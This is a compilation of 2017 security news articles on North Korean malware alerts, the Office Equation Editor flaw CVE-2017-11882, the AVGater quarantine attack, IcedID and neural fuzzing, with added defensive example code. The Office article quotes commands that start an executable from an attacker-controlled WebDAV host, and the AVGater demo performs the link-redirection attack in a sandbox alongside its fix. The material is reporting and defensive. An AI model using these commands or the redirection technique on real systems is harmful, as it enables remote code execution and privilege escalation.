Many experts believe the WannaCry ransomware was developed by the Lazarus Group due to similarities in the attack codes. UK Government also linked the WannaCry attack that crippled NHS to North Korea.

The DHS and FBI issued a joint alert that reveals a remote administration tool (RAT) known as FALLCHILL was used by the North Korean hackers to target companies in the aerospace, finance, and telecommunications sectors.

“Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a remote administration tool (RAT) used by the North Korean government—commonly known as FALLCHILL.” states the report.

“According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. “

The US experts identified 83 network nodes in the FALLCHILL infrastructure, including countries in which the infected IP addresses are registered.

The report includes a list of indicators of compromise (IOCs), Network Signatures associated with the threat and Yara rules for its detection.


The US DHS also published a separate report on another threat, the Volgmer Trojan used by the North Korean government. Volgmer is a backdoor Trojan “designed to provide covert access to a compromised system” and has been used since 2013.

“Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries.” states the report.

“It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer”

This second report also includes details of the infrastructure associated with the malware and IoCs.

The DHS tracked at least 94 static IP addresses along with dynamic IP addresses registered across various countries, most of them in India (772 IPs – 25.4 percent), Iran (373 IPs – 12.3 percent), and Pakistan (343 IPs – 11.3 percent).

The Volgmer malware has been used by Pyongyang in attacks against the government, financial, automotive, and media industries since at least 2013. Spear-phishing is suspected to be the primary delivery mechanism.

The DHS also warned that Hidden Cobra has a suite of custom tools at its disposal, some of which the North Korean hackers could use to initially compromise a system.


17-Year-Old MS Office flaw CVE-2017-11882 could be exploited to remotely install malware without victim interaction
15.11.2017 securityaffairs Vulnerebility

Oops: a 17-year-old flaw in MS Office, tracked as CVE-2017-11882, could be exploited by remote attackers to install malware without user interaction.
The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability can be triggered on all versions of the Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability, tracked as CVE-2017-11882, was discovered by the security researchers at Embedi, it affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

The component fails to properly handle objects in memory. An attacker who triggers the bug executes code in the context of the logged-in user, so the impact is greatest for users who work with administrative rights.

EQNEDT32.EXE was compiled for Microsoft Office 2000 seventeen years ago, and Office 2007 and later versions still ship the same binary to preserve backward compatibility with documents containing legacy equations; it therefore predates the exploit mitigations that newer Office components are built with.


To exploit the vulnerability, an attacker needs to trick the victim into opening a specially crafted file with an affected version of Microsoft Office or Microsoft WordPad. Code execution lands in the user's own context; an attacker can gain full control of the system by chaining the bug with a Windows kernel privilege-escalation exploit such as one for CVE-2017-11847, which was fixed in the same Patch Tuesday release.

Embedi researchers described several attack scenarios:

“By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it).” states the analysis published by Embedi.

“One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker.”

“Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient.”

“After that an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service.”

Microsoft addressed the vulnerability in the November Patch Tuesday release by changing the way the affected component handles objects in memory.

The experts warn that this vulnerable Office component contains many other security issues and suggest disabling it outright.

Disabling the component is simple: run the following command from an elevated command prompt (the value is written under HKLM, so administrative rights are required). It sets the Office COM "kill bit" for the Equation Editor class, so Office will no longer activate it; equations already embedded in documents can no longer be edited once the bit is set:

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

For a 32-bit Microsoft Office installation on 64-bit Windows, the value lives under the Wow6432Node key instead:

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

Microsoft users should also enable Protected View to prevent active content (OLE/ActiveX/macros) from running in documents that arrive from untrusted sources.
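Disabling the component protects the endpoint; a defender will also want to triage inbound documents for the component's objects before they reach users. The scanner below is an added example written for this page, not code from Embedi or Microsoft: it flags Equation Editor 3.0 content rather than any particular exploit, using the RTF \objclass control word, the hex-encoded ProgID that the OLE1 header inside an RTF \objdata blob carries, the plain ASCII ProgID found in the CompObj stream of .doc files, and the binary little-endian form of the CLSID that the registry workaround above disables. The sample RTF and OLE fragments are constructed, and the indicator names are the example's own.

```python
"""Flag documents that embed an Equation Editor (EQNEDT32.EXE) OLE object.

Added example, not part of the original article or Embedi's research. A hit
means the file deserves Protected View or quarantine; it does not prove the
object is malicious, because legitimate documents with legacy equations
trigger the same indicators.
"""
import re
import sys
import uuid
from typing import Dict, List

# CLSID of Equation Editor 3.0, the class the registry "kill bit" above disables
EQNEDT_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")
# Binary GUID layout (Data1..Data3 little-endian, Data4 as-is) as stored in OLE streams
EQNEDT_CLSID_LE = EQNEDT_CLSID.bytes_le

INDICATORS = [
    # RTF declares the embedded object's ProgID: {\*\objclass Equation.3}
    ("rtf-objclass-equation", re.compile(rb"\\objclass\s*Equation\.[23]", re.IGNORECASE)),
    # The OLE1 header inside \objdata repeats the class name, hex-encoded ("Equation.3")
    ("rtf-objdata-hex-equation", re.compile(rb"4571756174696f6e2e3[23]", re.IGNORECASE)),
    # Plain ASCII ProgID, as found in the CompObj stream of OLE2 (.doc) files
    ("progid-equation", re.compile(rb"Equation\.[23]", re.IGNORECASE)),
]


def find_equation_indicators(data: bytes) -> List[str]:
    """Return the names of the Equation Editor indicators present in raw document bytes."""
    hits = []
    # RTF writers wrap hex blobs across lines, so drop whitespace before pattern matching
    compact = re.sub(rb"\s+", b"", data)
    for name, pattern in INDICATORS:
        if pattern.search(compact):
            hits.append(name)
    if EQNEDT_CLSID_LE in data:  # binary CLSID inside an OLE compound file
        hits.append("ole-clsid-eqnedt32")
    return hits


def scan_paths(paths: List[str]) -> Dict[str, List[str]]:
    """Scan files on disk; returns only the paths that produced at least one hit."""
    results = {}
    for path in paths:
        with open(path, "rb") as f:
            hits = find_equation_indicators(f.read())
        if hits:
            results[path] = hits
    return results


# Constructed sample: minimal RTF with an embedded Equation.3 object whose \objdata
# blob starts with an OLE1 header (version, format, class-name length, "Equation.3\0")
SAMPLE_RTF = (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}"
              b"{\\*\\objdata 01050000020000000b000000\n"
              b"4571756174696f6e2e3300\n"
              b"0000000000000000}}}")
BENIGN_RTF = b"{\\rtf1 Nothing to see here.}"
# Constructed: the bytes a CompObj stream would carry for an Equation Editor object
SAMPLE_OLE = b"\x00" * 8 + EQNEDT_CLSID_LE + b"Equation.3\x00"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_paths(sys.argv[1:]).items():
            print(f"{path}: {', '.join(hits)}")
    else:
        for label, blob in (("rtf", SAMPLE_RTF), ("benign", BENIGN_RTF), ("ole", SAMPLE_OLE)):
            print(label, find_equation_indicators(blob))
```

Run it over a mail gateway's attachment directory, or feed it the files Protected View would open; anything it flags can be held until the kill bit is confirmed on the recipient's machine. Because the check is by class identity, it still fires on documents that merely contain a harmless legacy equation, which is the correct trade-off for the hold-and-review use but too noisy for automatic blocking.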


Windows Defender Immune to AVGater Quarantine Flaw: Microsoft
14.11.2017 securityweek Virus

A recently disclosed vulnerability that allows an attacker to abuse the quarantine feature of anti-virus products to escalate privileges doesn’t affect Windows Defender, Microsoft says.

Dubbed AVGater, the new attack method relies on a malicious DLL being quarantined by an anti-virus product and then abuses the security program’s Windows process to restore the file.

Because the anti-virus process typically runs as SYSTEM, the restore can be redirected so that the malicious file is written somewhere other than its original folder, such as under Program Files or the Windows directory, where it will be loaded with higher privileges.

This is possible because of NTFS junctions, a type of directory link: if the quarantined file's original folder is replaced by a junction, the restore follows it and writes the file wherever on the disk the attacker chose. Once the DLL sits in a folder from which a privileged Windows process is launched, that process loads it first, because Windows searches the application's own directory before the system directories when resolving DLL names.

“To exploit this vulnerability, malicious applications, including those launched by user-level accounts without administrator privileges, create an NTFS junction from the %System% folder to the folder where the quarantined file is located. This NTFS junction can trigger the antivirus product to attempt to restore the file into the %System% folder,” Microsoft explains.

Discovered by Florian Bogner, information security auditor at Austria-based Kapsch, the bug was said to affect products from a large number of anti-virus makers. However, only Trend Micro, Emsisoft, Kaspersky Lab, Malwarebytes, Check Point (ZoneAlarm) and Ikarus were named, as they have already patched the issue.

In a blog post, Microsoft underlines the fact that Windows Defender is not affected by the AVGater flaw, which relies on a non-administrator account being allowed to restore a quarantined file.

According to Microsoft, the vulnerability represents a relatively old attack vector, but “Windows Defender Antivirus has never been affected by this vulnerability because it does not permit applications launched by user-level accounts to restore files from quarantine.”

The tech giant explains that this design feature was meant as a built-in protection and that the security application includes similar safety measures against other known user-account permissions vulnerabilities as well.
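The redirection Microsoft describes, and the two checks that defeat it, as an added example that is not code from Microsoft, Kapsch or any anti-virus vendor. It runs on a POSIX system with a symlink standing in for the NTFS junction (a naive restore follows either without noticing); the quarantine store, the "system" directory and the administrator flag are stand-ins constructed for the demo, and the file names are invented.

```python
"""AVGater-style redirection of a quarantine restore, and the checks that stop it.

Added example; not code from Microsoft, Kapsch or any anti-virus vendor.
A POSIX symlink stands in for the NTFS junction, a plain directory stands in
for the quarantine store, and a temp folder plays the role of %System%.
The "administrator" flag is passed in explicitly to keep the demo portable.
"""
import os
import shutil
import tempfile
from dataclasses import dataclass
from pathlib import Path


@dataclass
class QuarantineEntry:
    name: str          # file name as it was detected
    original_dir: str  # directory it was taken from, fully resolved at quarantine time
    stored: Path       # where the quarantine keeps the bytes


def quarantine(src: Path, store: Path) -> QuarantineEntry:
    """Move a detected file into the store and record where it came from."""
    original_dir = str(src.parent.resolve())
    dest = store / f"{src.name}.quar"
    shutil.move(str(src), str(dest))
    return QuarantineEntry(src.name, original_dir, dest)


def restore_unsafe(entry: QuarantineEntry) -> Path:
    """Vulnerable restore: trusts whatever the recorded directory path points to *now*."""
    target = Path(entry.original_dir) / entry.name
    target.write_bytes(entry.stored.read_bytes())  # silently follows a link planted here
    return target


def restore_hardened(entry: QuarantineEntry, caller_is_admin: bool) -> Path:
    """Hardened restore: administrators only, and only if the directory is still itself."""
    if not caller_is_admin:
        raise PermissionError("restoring from quarantine requires an administrator")
    recorded = Path(entry.original_dir)
    # A junction/symlink dropped in place of the original folder changes what it resolves to
    if recorded.is_symlink() or recorded.resolve() != recorded:
        raise RuntimeError(f"{recorded} has been redirected; refusing to restore")
    target = recorded / entry.name
    # O_EXCL|O_NOFOLLOW: no pre-planted file or link at the final path component either
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(target, flags, 0o644)
    with os.fdopen(fd, "wb") as f:
        f.write(entry.stored.read_bytes())
    return target


def demo() -> dict:
    """Mount the attack against both restore routines and report what happened."""
    root = Path(tempfile.mkdtemp())
    try:
        user_dir, store, system_dir = root / "user", root / "quarantine", root / "system"
        for d in (user_dir, store, system_dir):
            d.mkdir()
        malicious = user_dir / "evil.dll"
        malicious.write_bytes(b"MZ constructed sample, not a real DLL")
        entry = quarantine(malicious, store)  # the AV takes the file away

        # Unprivileged attacker: replace the now-empty folder with a link to the privileged one
        user_dir.rmdir()
        os.symlink(system_dir, user_dir, target_is_directory=True)

        restore_unsafe(entry)
        landed_in_system = (system_dir / "evil.dll").exists()

        try:
            restore_hardened(entry, caller_is_admin=True)
            hardened_refused = False
        except RuntimeError:
            hardened_refused = True
        try:
            restore_hardened(entry, caller_is_admin=False)
            nonadmin_refused = False
        except PermissionError:
            nonadmin_refused = True
        return {"unsafe_landed_in_system": landed_in_system,
                "hardened_refused": hardened_refused,
                "nonadmin_refused": nonadmin_refused}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The admin-only rule is the one Microsoft cites for Windows Defender; the path check is the defence-in-depth a product needs if it does let users restore. Resolving the recorded directory at quarantine time and comparing it again at restore time catches the junction whether it was planted at the folder itself or at any parent, and O_EXCL with O_NOFOLLOW covers a link or file planted at the final name.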


Medigate Emerges From Stealth With Medical Device Firewall
14.11.2017 securityweek Safety

Israel-based startup Medigate emerged from stealth mode on Tuesday with a firewall designed specifically for protecting medical devices, and more than $5 million in seed funding.

Healthcare organizations have been increasingly targeted in the past few years, including in ransomware attacks and operations whose goal was to obtain sensitive medical information. Experts have often also warned about the possibility of attacks aimed at disrupting medical treatment.

While medical devices are increasingly connected, protecting them against cyber threats requires a different approach compared to common IT systems. Applying software patches and installing traditional endpoint security solutions on medical systems can cause disruptions, which is why these devices often remain vulnerable and serve as key pivot points within the targeted organization’s network, as shown by the MEDJACK attacks.

Medigate aims to address this problem with a dedicated platform for securing medical devices that are connected to electronic medical records, device servers, other enterprise systems, and even the Internet.

Using knowledge of the medical workflow, Medigate’s firewall solution provides complete visibility into all devices on the network and allows organizations to quickly identify anomalies and suspicious activity. In addition to detecting threats, the product also blocks malicious communications to prevent any damage, Medigate said.

The firewall sits between the medical devices and the servers they communicate with in an effort to prevent attackers from taking control of this part of the network.


“Because it is not possible to effectively deploy endpoint security solutions and regular security patches to these devices, they significantly increase the exposure in my organization’s overall risk posture,” said Heath Renfrow, U.S. Army Medicine CISO. “A product like Medigate would add a much necessary layer of defense, significantly reducing the risk of medical device vulnerabilities to my networks.”

Medigate’s solution is currently available to a limited number of qualified organizations, but it’s expected to become generally available in mid-2018.

Medigate has raised $5.35 million in a seed funding round led by YL Ventures, a seed-stage venture capital firm that invests in Israeli innovations, with participation from early-stage VC company Blumberg Capital.


The Disconnect Between Security Perception and Security Reality
14.11.2017 securityweek Security
A new global survey highlights the disconnect between security expectations and security reality for many IT/security professionals.

There is an awareness of the likelihood of security attacks (45% of respondents expect one within the next 12 months), and there is ongoing empirical evidence that security professionals fail to stop such attacks, most recently at Equifax. Despite this, 89% of survey respondents believe they are in a good position to protect themselves from attack.

The survey report (PDF), 'Security Practices and Expectations Following the World's Biggest Breach' (Equifax), was published on Monday by Varonis. Five hundred IT and security professionals with personal responsibility for security were questioned between September 28 and October 6, 2017. Two hundred are located in the U.S., with 100 in each of the UK, France and Germany. All work for companies with more than 1,000 employees across a variety of vertical industry sectors.

SecurityWeek asked Matt Lock, director of sales engineers at Varonis, why there should be this difference between expectation and reality. One often-quoted possibility is the Optimism Bias (Wikipedia) -- the hard-coded biological instinct that bad things happen to other people, not to me.

Lock doesn't feel that the survey sheds any light on the reasons for the disconnect, merely that it exists. From a personal stand-point he points to over-confidence and possibly a lack of visibility into their own networks. On the former, he commented, "Some really do feel they are completely prepared and have figured out how to keep their organizations safe. In 2017, many well-respected organizations, which would seem to have the resources to ward off cyberattacks, fell victim to breaches and ransomware. Was over-confidence to blame?"

For the latter, he wonders if track-record might be a contributing factor: professionals who don't believe they have been breached might believe "that what they're doing must be working. The reality, however, might be that they have been breached but just don't know it."

Nevertheless, despite the confidence in their ability to resist future attacks, around 25% of the respondents confirmed that their organization had experienced data loss, data theft or ransomware during the last two years. This was highest in Germany, where 34% of respondents reported that their organization had been a victim of ransomware.

The perceived ability to resist attacks is not the only surprising detail to come from the survey. Given the relative imminence of GDPR next year, and the common perception that many companies are still not GDPR-compliant, it would be unsurprising to see 'compliance' as an issue of concern.

This is not shown in practice. In the US, compliance ranks only third in concerns for 2018 (behind data theft and data loss). In the UK it ranks fifth, behind the extra concerns for ransomware and cloud issues, while in neither France nor Germany does it rank anywhere in the top five concerns for next year.

"One possible explanation," Lock told SecurityWeek, "is that the U.S. is reacting more strongly towards GDPR because there hasn't been a regulation quite as stringent in place save for a few highly regulated industries. The attitude in UK, France, and Germany may be that GDPR is just a new spin on the current EU Data Protection Directive (DPD)."

However, he suggests this might change once GDPR starts to be enforced. One possibility is that organizations believe that 2018 will be a bedding-in period for the regulations, and they won't be enforced before 2019. He also suggests that top-of-mind for security professionals could be their most recent fire-fight. "In many ways," he suggested, "security professionals are fighting the last fight; they may be focusing their attention on ransomware and wipers, rather than looking ahead to the GDPR."

A further surprising detail comes in the rate of cyberattack experience. A common perception is that the U.S. experiences more attacks than Europe, for two reasons: first, the heavier reliance on IT in North American business; and second, the more stringent breach notification laws in America make breach reporting more common than in Europe, so Europe does not report all of the attacks it experiences.

However, this perception is reversed by the survey respondents. Twenty-three percent of U.S. organizations have experienced the loss or theft of company data over the last few years; but this figure rises to 29% in Europe.

"The results are surprising," comments Lock; "and this survey gives us a peek behind the curtain. The figures in the survey suggest there's no correlation, and that organizations are being hit in greater numbers than we previously thought -- possibly they are simply keeping that information to themselves to avoid negative publicity. We may see a notable increase in reported attacks once GDPR kicks in. The results suggest the problem could be much worse than we realize."


Cloudflare Acquires Mobile App Specialist Neumob
14.11.2017 securityweek Mobil

Website performance optimization and security firm Cloudflare has expanded its reach to mobile with the acquisition of Neumob. The agreement brings Cloudflare's global optimization network to mobile apps built with the Neumob SDK. Financial details were not disclosed.

Sunnyvale, Calif.-based Neumob is a firm predicated on improving the performance of mobile computing. Poorly designed apps and the inherent latency of mobile computing mean that one of the most dynamic areas of the internet is also the slowest. Neumob addresses this issue with an SDK aimed at app developers. Its unique selling point is that even slight improvements in internet performance increase user retention and customer conversion.

Neumob claims that its SDK improves load times and in-app performance by 30% to 300%, and reduces app errors and timeouts by up to 90%. It also significantly reduces bandwidth usage and data fees, the company says. "We have a purpose-built solution for the first, middle and last miles traveled in every session," explains the company on its website. "The Neumob SDK is the world's first end-to-end accelerator for app owners and developers. It provides a mobile app with instant access to acceleration and error reduction features at all stages of the mobile delivery process -- the first mile, middle mile and last (mobile) mile."

The weakness is the 'middle mile' -- the internet itself. Neumob has sought to remedy this with the development of its own network of points of presence (POPs) -- 164 in 95 metropolitan areas across 6 continents. It's a start, but hardly a global network.

Cloudflare has that global network: 118 data centers in 58 countries with more than 7 million domains that already routes 10% of all HTTP/HTTPS Internet traffic. It also has the technology to move data across the internet with optimum performance. Argo, for example, analyzes the performance of network paths to route traffic across the fastest available paths. It maintains open secure communications and eliminates the latency of connection setup.

The combination of Neumob and Cloudflare will benefit both parties. "We've long needed a global network running at the edge to fully realize the technology we've created at Neumob," said Jeff Kim, co-founder of Neumob. "Now that we're a part of the Cloudflare team, we have a tremendous opportunity to engage with Cloudflare's customers and improve the mobile experience for users around the world."

"Cloudflare's mission is to help build a better Internet -- we mean that literally," said Matthew Prince, co-founder and CEO of Cloudflare. "With Neumob, we're now able to reach the last-mile of connectivity and provide the fastest and most secure experience possible for users everywhere, on any device."

Neumob was founded in 2015. It raised $10.9 million in the same year -- $2.3 million in seed funding followed by $8.5 million in a Series A round led by Accel Partners.

San Francisco, CA-based Cloudflare was founded in 2009. It has raised a total funding amount of $182,050,000 -- the most recent being $110 million Series D funding led by Fidelity Investments in September 2015. It routes traffic through its own global network, blocking DoS attacks, reducing spam and improving performance.

Earlier this year, Cloudflare collaborated with Flashpoint, Akamai and RiskIQ in a cross-vendor project to neutralize the newly emerging WireX botnet.


Freedom on the Net report – Manipulating social media, hacking elections and much more
14.11.2017 securityweek BigBrothers

Freedom on the Net report – Online manipulation played a crucial role in elections in at least 18 countries over the past year, including the United States.
While security experts still debate the cyber attacks on the 2016 U.S. presidential election, the independent watchdog Freedom House reports that online manipulation affected elections in at least 18 countries over the past year.

The group surveyed 65 countries accounting for 87 percent of the world's internet users and found that in at least 18 of them, governments or other actors had tried to influence an election through online manipulation or by restricting and interfering with internet use.

According to the organization, governments around the world are dramatically increasing their efforts to manipulate information on social media, threatening the notion of the internet as a liberating technology. This is the message that emerges from the annual Freedom on the Net report.

“The use of paid commentators and political bots to spread government propaganda was pioneered by China and Russia but has now gone global,” said Michael Abramowitz, president of Freedom House. “The effects of these rapidly spreading techniques on democracy and civic activism are potentially devastating.”

While in some cases the interference attempts were performed by foreign actors, in the majority of the cases they were carried out either by the local government or opposition. The watchdog reported that 30 countries have now been found to be running armies of trolls to try and influence public sentiments on specific topics.

“Venezuela, the Philippines, and Turkey were among 30 countries where governments were found to employ armies of “opinion shapers” to spread government views, drive particular agendas, and counter government critics on social media.” states the report. “The number of governments attempting to control online discussions in this manner has risen each year since Freedom House began systematically tracking the phenomenon in 2009.”

The Chinese government is the most active in this respect, using a cyber army of bloggers and social media users who support its policies and discredit political opponents. China is not alone: in Russia, the Internet Research Agency is the "troll farm" reportedly financed by a businessman with close ties to President Vladimir Putin.

Unlike other methods of censorship, online content manipulation is very difficult to detect and combat, and countering it takes time and resources.

“Not only is this manipulation difficult to detect, it is more difficult to combat than other types of censorship, such as website blocking, because it’s dispersed and because of the sheer number of people and bots deployed to do it,” said Sanja Kelly, director of the Freedom on the Net project. “The fabrication of grassroots support for government policies on social media creates a closed loop in which the regime essentially endorses itself, leaving independent groups and ordinary citizens on the outside.”


Giving a look at other data in the report, Freedom House classified only 23 percent of the internet as “free.”


Fourteen countries passed laws this year restricting internet use, in some cases banning VPNs, and 19 countries shut down the internet in some form during political events.

The report also warns that physical attacks on netizens and online journalists are spreading globally: in 8 countries (including Brazil, Mexico, Pakistan, and Syria) journalists or online commentators were killed for their online activities.

According to the Freedom on the Net report, things will get worse in the future.


IcedID, a new sophisticated banking Trojan doesn’t borrow code from other banking malware
14.11.2017 securityweek Virus

Researchers at IBM have spotted a new banking malware, dubbed IcedID, whose capabilities resemble those of other financial threats like Gozi, Zeus, and Dridex.
Malware researchers at IBM X-Force have spotted a new strain of banking malware, dubbed IcedID, with capabilities similar to those of other financial threats like Gozi, Zeus, and Dridex. IcedID does not borrow code from other banking malware, but it implements comparable features.
“Overall, this is similar to other banking Trojans, but that’s also where I see the problem,” says Limor Kessem, executive security advisor for IBM Security.

The banking Trojan was first observed in September in campaigns aimed at banks, payment card providers, mobile service providers, payroll, Webmail, and e-commerce sites in the United States and Canada.

The malware also targeted two major banks in the United Kingdom.

The experts highlighted the distribution technique adopted by IcedID, which leverages the Emotet Trojan. Emotet is delivered via spam emails, usually disguised as productivity files containing malicious macros, and stays quietly resident so that its operators can use it to distribute other payloads, such as IcedID.

IcedID can propagate over a network, which suggests its authors developed it to target large businesses.

“IcedID can propagate over a network. It monitors the victim’s online activity by setting up a local proxy for traffic tunneling, which is a concept reminiscent of the GootKit Trojan. Its attack tactics include both webinjection attacks and sophisticated redirection attacks similar to the scheme used by Dridex and TrickBot.” reads the analysis published by IBM.

The redirection scheme implemented by IcedID is designed to appear as seamless as possible to the victim. It includes displaying the legitimate bank’s URL in the address bar and the bank’s correct SSL certificate by keeping a live connection with the actual bank’s site.

The malware watches the browser's traffic for the target URLs; when it encounters a trigger, it either performs a web injection into the bank's page or redirects the victim to a fake banking website, which the crooks use to trick victims into submitting their credentials.


The attacker controls the victim’s session and uses social engineering to trick victims into sharing transaction authorization data.

The level of sophistication of the IcedID malware suggests the attackers belong to a well-structured group. The analysis of comments in IcedID code indicates the attackers are from Russian-speaking regions.

Experts believe the threat could evolve in the near future, for example by adding anti-virtual-machine and anti-analysis techniques along with sandbox evasion.

Further technical details on the malware, including the Indicators of Compromise, are available in the blog post published by IBM.


Microsoft Uses Neural Networks to Improve Fuzzing
14.11.2017 securityweek IT
A team of Microsoft researchers has been working on improving fuzzing techniques by using deep neural networks, and initial tests have shown promising results.

Fuzzing is used to find software vulnerabilities – particularly memory corruption bugs – by injecting malformed or semi-malformed data into the targeted application. If the software crashes or behaves unexpectedly, it could indicate the presence of a security flaw.

There are three types of fuzzing: whitebox fuzzing, which uses knowledge of the program's source or disassembled code to derive inputs; blackbox fuzzing, which treats the program as opaque and needs no access to its code; and greybox fuzzing, which also works without source but uses lightweight instrumentation, typically code coverage from previous executions, as feedback.

Experts at Microsoft have attempted to improve this feedback loop using a type of machine learning called deep neural networks (DNN). Neural networks, a set of algorithms modeled after the human brain, are designed to recognize patterns in an effort to help classify and cluster data.

Neural networks have been used by several companies for security-related purposes, including for detecting spam and malware, and even in Apple’s new Face ID feature.

Microsoft researchers have been trying to use neural networks for a learning technique that relies on patterns in previous fuzzing iterations to guide future iterations.

“The neural models learn a function to predict good (and bad) locations in input files to perform fuzzing mutations based on the past mutations and corresponding code coverage information,” the researchers said.

The method has been implemented in American Fuzzy Lop (AFL), a popular open source fuzzer developed by Google researcher Michal Zalewski. Tests were conducted against parsers for the ELF, PDF, PNG and XML file formats.

The tests showed significant improvements in the results obtained with the neural AFL compared to the original AFL, except for PDF files, which experts believe may be too large. Improvements were seen in terms of code coverage, unique code paths and crashes.

The team behind the project believes this approach can be applied to any fuzzer, not just AFL.
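How a fuzzer can learn where to mutate from coverage feedback, as an added example that is not Microsoft's neural fuzzing code and not AFL. A per-offset score table stands in for the deep neural network: each mutation reports whether touching that byte offset led to new coverage, and the table is updated so offsets with a record of opening new paths are picked more often. The parser is a constructed toy target instrumented by hand to return the branches it executed (the signal AFL gets from compile-time instrumentation), and the dictionary token and all parameter values are the example's own choices.

```python
"""Learning where to mutate from coverage feedback, the idea behind neural fuzzing.

Added example, not Microsoft's neural fuzzing code and not AFL. A per-offset
score table stands in for the deep neural network; the target is a constructed
toy parser that returns the set of branch IDs it executed.
"""
import random
from typing import Callable, List, Set, Tuple

# Constructed dictionary token, the way AFL's -x dictionary supplies magic values
TOKENS = [b"\x89PNG"]


def toy_parser(data: bytes) -> Set[str]:
    """Constructed target: magic-byte check, then a big-endian length field.

    Returns the set of branch IDs that executed; only bytes 0..7 are inspected.
    """
    hit = {"entry"}
    if len(data) < 8:
        hit.add("too_short")
        return hit
    if data[0] == 0x89:
        hit.add("magic0")
        if data[1:4] == b"PNG":
            hit.add("magic1")
            length = int.from_bytes(data[4:8], "big")
            if length > len(data) - 8:
                hit.add("bad_length")   # the kind of branch where memory bugs live
            else:
                hit.add("good_length")
    return hit


class LocationModel:
    """Scores each byte offset by how often mutating it produced new coverage."""

    def __init__(self, size: int, boost: float = 4.0, decay: float = 0.98, floor: float = 0.05):
        self.scores: List[float] = [1.0] * size   # start uniform: no history yet
        self.boost, self.decay, self.floor = boost, decay, floor

    def choose(self, rng: random.Random) -> int:
        """Sample an offset in proportion to its score."""
        return rng.choices(range(len(self.scores)), weights=self.scores, k=1)[0]

    def update(self, offset: int, found_new_coverage: bool) -> None:
        """Reward offsets that opened new paths; slowly forget the ones that did not."""
        if found_new_coverage:
            self.scores[offset] *= self.boost
        else:
            self.scores[offset] = max(self.floor, self.scores[offset] * self.decay)


def mutate(parent: bytes, offset: int, rng: random.Random) -> bytes:
    """Overwrite at offset with a random byte or a dictionary token; length stays constant."""
    child = bytearray(parent)
    if rng.random() < 0.2:
        tok = rng.choice(TOKENS)
        child[offset:offset + len(tok)] = tok[:len(child) - offset]
    else:
        child[offset] = rng.randrange(256)
    return bytes(child)


def fuzz(target: Callable[[bytes], Set[str]], seed: bytes, iterations: int,
         rng: random.Random) -> Tuple[Set[str], List[float]]:
    """Coverage-guided loop: keep inputs that reach new branches, learn which offsets did it."""
    corpus = [seed]
    seen: Set[str] = set(target(seed))
    model = LocationModel(len(seed))
    for _ in range(iterations):
        parent = rng.choice(corpus)
        offset = model.choose(rng)
        child = mutate(parent, offset, rng)
        coverage = target(child)
        found_new = not coverage <= seen     # any branch never executed before?
        model.update(offset, found_new)      # credit goes to the offset that was mutated
        if found_new:
            seen |= coverage
            corpus.append(child)
    return seen, model.scores


if __name__ == "__main__":
    branches, scores = fuzz(toy_parser, b"\x00" * 16, 5000, random.Random(7))
    print("branches reached:", sorted(branches))
    print("offset scores:", [round(s, 2) for s in scores])
```

After a run, the offsets the parser never reads (8 and above here) can never have been rewarded, so their scores only decay, while the header and length bytes accumulate most of the weight; that skew is what the Microsoft model learns, with the difference that a neural network conditions on the input's content as well as on the offset, so it can also tell that a byte that was worth mutating in one file is not worth mutating in another.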

“We believe our neural fuzzing research project is just scratching the surface of what can be achieved using deep neural networks for fuzzing,” explained Microsoft’s William Blum. “Right now, our model only learns fuzzing locations, but we could also use it to learn other fuzzing parameters such as the type of mutation or strategy to apply. We are also considering online versions of our machine learning model, in which the fuzzer constantly learns from ongoing fuzzing iterations.”

Blum is the lead of the engineering team for Microsoft Security Risk Detection, a recently launched cloud-based fuzzing service that uses artificial intelligence to find bugs and vulnerabilities in applications. The results of the research into the use of neural networks for fuzzing could help improve this service.

Another recently launched Microsoft tool designed for finding memory corruption bugs, VulnScan, might also be added to the Security Risk Detection service.


Financial Services Has Most Code Vulnerabilities of All Industries: Analysis
14.11.2017 securityweek Vulnerebility
Last week, the Securities Industry and Financial Markets Association (SIFMA) ran Quantum Dawn IV to test the resiliency and response of the financial services industry to a major cyber incident. Today, a new CAST report on application security health (CRASH) highlights that finance has some of the worst code -- in security terms -- of all the major industry sectors.

The details come from the CAST Software CRASH Report on Application Security (PDF). CAST analyzed 278 million lines of code from 1,388 applications and found 1.3 million CWE (MITRE's Common Weakness Enumeration) weaknesses in code developed under .NET and Java EE. The implication is that the banking sector will need to take considerable care in the implementation of Europe's open banking regulation (PSD2) due to come into force in January 2018. It will need to ensure that third-parties do not implement insecure code with access to banking code that already has a higher than average density of its own coding flaws.

